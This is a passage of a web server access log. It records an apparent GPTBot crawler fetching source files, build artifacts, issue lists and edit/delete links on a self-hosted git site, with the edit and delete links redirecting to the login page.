compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:17:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:17:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12640] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py?display=source" [Client 74.7.227.38] [Length 30164] [Gzip 8.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:17:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:17:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12640] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17128] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:17:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17095] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:17:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" [Client 74.7.227.38] [Length 13602] [Gzip 6.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%20PostgreSQL%20%EC%9E%91%EC%97%85.md" +[17/Feb/2026:17:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16194] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11006] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 74.7.227.38] [Length 11211] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:17:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:34:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176985] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:17:34:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/cpp" +[17/Feb/2026:17:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/main.py?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" +[17/Feb/2026:17:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72030] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10098] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 660134] [Gzip 25.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 1540] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" +[17/Feb/2026:17:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11844] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:34:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 